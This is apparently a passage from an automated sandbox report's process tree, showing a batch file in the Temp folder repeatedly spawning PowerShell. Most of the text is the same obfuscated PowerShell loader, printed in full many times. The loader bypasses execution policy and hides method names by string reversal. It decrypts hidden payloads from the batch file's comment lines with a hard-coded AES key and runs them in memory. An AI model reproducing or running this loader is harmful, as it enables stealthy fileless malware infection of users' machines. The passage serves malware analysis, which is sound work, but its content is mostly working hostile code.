$BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        123⤵
        
        PID:1584
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        121⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        122⤵
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        120⤵
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        121⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1716
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        119⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        120⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1212
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        118⤵
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        119⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1168
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        117⤵
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        118⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2092
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        116⤵
        
        PID:2548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        117⤵
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        115⤵
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        116⤵
        
        PID:2132
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        114⤵
        
        PID:1192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        115⤵
        
        PID:1076
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        113⤵
        
        PID:1936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        114⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        112⤵
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        113⤵
        
        PID:2828
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        111⤵
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        112⤵
        
        PID:2396
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        110⤵
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        111⤵
        
        PID:2704
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        109⤵
        
        PID:1212
        
